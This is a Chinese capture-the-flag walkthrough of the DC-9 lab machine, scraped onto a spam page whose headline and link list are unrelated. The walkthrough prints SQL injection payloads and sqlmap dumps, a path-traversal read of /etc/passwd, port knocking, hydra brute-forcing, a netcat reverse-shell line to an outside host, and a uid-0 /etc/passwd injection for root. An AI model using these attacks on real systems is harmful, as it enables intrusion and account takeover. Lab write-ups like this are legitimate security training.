当前位置: 首页 > news >正文

烈士陵园网站建设方案百度文库电商数据分析怎么做

烈士陵园网站建设方案百度文库,电商数据分析怎么做,备案 几个网站,c 做的网站#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收藏… 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 一、信息收集 1.主机扫描 扫描到靶机IP192.168.103.209 ┌──(rootkali)-[~/桌面] └─# arp-scan -l2.端口扫描 DC靶场系列的老样子22、80端口 但是发现22端口关闭了一般渗透都是需要ssh连接或者说反弹shell之类的都是需要22端口开启的 所有说后面我们会尝试把22端口开启 ┌──(rootkali)-[~/桌面] └─# nmap -sS -A -p- 192.168.103.2093.web页面 访问80端口 点击manage跳出登录窗口 后续应该要收集信息收集账号密码登录 4.目录扫描 /config.php、/includes、/display.php、/search.php、/search.php ┌──(rootkali)-[~/桌面] └─# dirsearch -u http://192.168.103.2091./config.php 没有发现什么有价值的信息 2./includes 3.search.php 点击search 有个输入框可以试试有没有sql注入 输入框里面输入1or 11# 验证是否有sql注入 发现跳转到了这个界面说明此页面应该是有SQL注入 可以看出来这个sql注入是POST注入的 5.sql注入 一、手工注入 求列数 search1 union select 1,2,3,4,5,6#求数据库 search1 union select 1,2,3,4,5,database()#求表 search1 union select 1,2,3,4,5,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())#求字段 search1 union select 1,2,3,4,5,(select group_concat(column_name) from information_schema.columns where table_nameUsers)#查看UsernamePassword字段的值 search1 union select 1,2,3,4,5,(select group_concat(concat_ws(~,Username,Password)) from Users)#┌──(rootkali)-[~/桌面] └─# hash-identifier 856f5de590ef37314e7c3bdf6f8a66dc 判断密码是MD5加密的账号admin 密码transorbital1二、sqlmap一把梭 sqlmap -u http://192.168.103.209/results.php --datasearch1 --batch #查看是否存在漏洞sqlmap -u http://192.168.103.209/results.php --datasearch1 --batch --dbs #查看库sqlmap -u http://192.168.103.209/results.php --datasearch1 --batch -D users --tables #查看表sqlmap -u http://192.168.103.209/results.php --datasearch1 --batch -D users -T UserDetails --dump #列出管理员账号密码爆表都是员工账号和密码先放着不管了再去把另一个数据库staff的数据表也爆一下 sqlmap -u http://192.168.103.209/results.php --data search1 -D Staff -tablessqlmap -u http://192.168.103.209/results.php --data search1 -D Staff -T Users --dump -batch 账号密码 admin | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) 6.登录web页面 账号admin 密码transorbital1点击Add Record 猜测可能存在文件包含漏洞所以在manage.php的url处接入file参数读取/etc/passwd文件在url后面加入?file../../../../etc/passwd顺利读取到/etc/passwd文件 但是到这里不知该怎么进行下去了我们再从头看看发现22端口的流量被过滤了所以查阅了一些资料看了看一些教程猜测这里可能存在knockd服务 https://www.cnblogs.com/f-carey/p/16066178.htmlhttps://www.cnblogs.com/f-carey/p/16066178.html knockd服务: 端口敲门服务即knockd服务。 该服务通过动态的添加iptables规则来隐藏系统开启的服务使用自定义的一系列序列号来“敲门” 使系统开启需要访问的服务端口才能对外访问。 不使用时再使用自定义的序列号来“关门”将端口关闭不对外监听。进一步提升了服务和系统的安全性。//默认文件是 /etc/knockd.conf 接下来我们就是需要对其ssh依次敲门了然后打开ssh服务进行ssh远程连接 通过文件包含读取knockd的默认配置文件/etc/knockd.conf 依次对7469、8475、9842端口进行敲门然后就可以开门命令 nmap -p 7469 192.168.103.209 nmap -p 8475 192.168.103.209 nmap -p 9842 192.168.103.209 依次访问之后重新扫描22端口可发现ssh服务已经开启可以访问 把这里面的password和username保存在本地文件 后面用九头蛇爆破然后利用ssh远程连接 然后使用两个字典进行爆破 ┌──(rootkali)-[~/桌面] └─# hydra 192.168.103.209 -L user.txt -P passwd.txt ssh爆破的账号密码如下 用户 密码 chandlerb UrAG0D! joeyt Passw0rd janitor Ilovepeepee 二、漏洞利用 1.ssh连接 1.chandlerb远程连接没有发现什么目录 ┌──(rootkali)-[~/桌面] └─# ssh chandlerb192.168.103.2092.joeyt 也是一样 3.janitor 多了一个文件.secrets-for-putin 新发现了很多的账号和密码 把这些都添加到开始的账号密码文件中 passwords-found-on-post-it-notes.txt #密码/home #账号┌──(rootkali)-[~/桌面] └─# hydra 192.168.103.209 -L user.txt -P passwd.txt ssh新的账号和密码 账号fredf 密码B4-Tru3-001┌──(rootkali)-[~/桌面] └─# ssh fredf192.168.103.209 2.sudo -l提权 就是以root权限会进行执行/opt/devstuff/dist/test这个文件 所有我们接下来要进入这个文件中然后进行写入木马然后进行反弹shell然后拿到root权限 echo nc -nv 192.168.103.129 1234 -c bash/opt/devstuff/dist/test/test发现权限不够写入失败 3.openssl账户密码加密 再回到上一个目录查看在/opt/devstuff目录下发现了一个test.py脚本文件 这是一个写入文件的脚本生成一个密码用root权限执行脚本写入/etc/passwd文件所以我们现在就需要构造一个拥有root权限的用户并且在/etc/passwd文件中储存只要使用这个用户登录后就可以获取到root权限 现在我们回到kali使用openssl工具创建一个本地的加密用户 ┌──(rootkali)-[~/桌面] └─# openssl passwd -1 -salt admin1 admin1 $1$admin1$QDqsIRd5/oAdiXk0vdS1C/跳转到/opt/devstuff/dist/test目录下使用echo命令在/tmp目录下创建一个文件文件名自定义就行我使用test2 echo admin1:$1$admin1$QDqsIRd5/oAdiXk0vdS1C/:0:0::/root:/bin/bash /tmp/test2执行sudo命令的时候要在/opt/devstuff/dist/test目录下执行 用sudo命令执行test文件将/tmp/test2的内容写入到/etc/passwd文件中 sudo ./test /tmp/test2 /etc/passwd4.flag
http://www.huolong8.cn/news/226728/

相关文章:

  • 广州白云区建站外贸公司珠海建网站的联系方式
  • 巫山做网站那家好即刻搜索引擎入口
  • php网站开发说明做网站不推广管用吗
  • 建筑工程发布网站单机版网页制作软件
  • 怎样在建立公司网站ps做网站效果图
  • 怎么做可以访问网站成都网站的建设
  • 网站建设公司的市场开发方案个人做网站时不要做什么样的网站
  • 百度一下你就知道官方网站纯html网页模板
  • 男女一起做暖暖网站如何设计网页作业
  • 网站制作算是什么专业苏州网络营销推广软件运营
  • 五分钟自己创建网站的方法商标注册45大类明细
  • 个人网站制作dwnas怎么做网站服务器
  • 网站建设有名的公司广告策划与营销
  • wordpress国外网站网站导航内链建设
  • 乌市正规网站建设wordpress查看图片插件
  • 站内优化主要从哪些方面进行学生个人网页制作html动态
  • 通过apache建设网站kol合作推广
  • 东莞技术好的网站建设赣州百姓网免费发布信息网
  • 本地网站建设方案信息大全百度网盟推广步骤
  • 1+x数字营销网站建一个网上商城需要多少钱
  • 哔哩哔哩网站怎么做视频软件wordpress增加标签页
  • 做网站维护工商经营范围是什么wordpress全屏博客
  • 做影集的网站或软件下载哪个网站论文多
  • 做公司网站的价格河西做网站的公司
  • 网站制作营销型中国营销
  • 东莞网站建设网站推广中国学校网站前台模板
  • 网站推广方案中确定目标是指关于平面设计的网站
  • 最好的机票网站建设网站备案信息核验单填写
  • 网站的页面设计wordpress页面源代码
  • 自己在网站开发的客户怎么联系招聘系统推广哪家好